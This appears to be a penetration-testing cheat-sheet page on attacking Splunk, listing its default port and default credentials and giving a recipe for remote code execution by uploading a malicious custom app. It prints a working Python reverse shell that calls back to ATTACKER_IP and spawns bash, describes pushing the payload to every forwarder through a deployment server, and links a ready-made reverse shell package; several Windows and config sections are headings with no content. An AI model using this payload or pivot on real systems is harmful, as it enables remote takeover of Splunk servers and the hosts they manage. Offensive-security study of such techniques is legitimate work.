githubEdit

Splunk

Discovery

  • Default port: 8000

  • Often runs as root (Linux) or SYSTEM (Windows)

  • Default creds: admin:changeme


Custom App RCE (Authenticated)

Create Malicious App Structure

mkdir -p splunk_shell/bin splunk_shell/default

Linux - rev.py

import sys,socket,os,pty

ip="ATTACKER_IP"
port="443"
s=socket.socket()
s.connect((ip,int(port)))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')

Windows - run.ps1

Windows - run.bat

inputs.conf

Package and Upload

Catch Shell


Deployment Server Pivot

If compromised host is a deployment server:

All hosts with Universal Forwarders will execute the payload.


Pre-built Reverse Shell Package

https://github.com/0xjpuff/reverse_shell_splunk

Last updated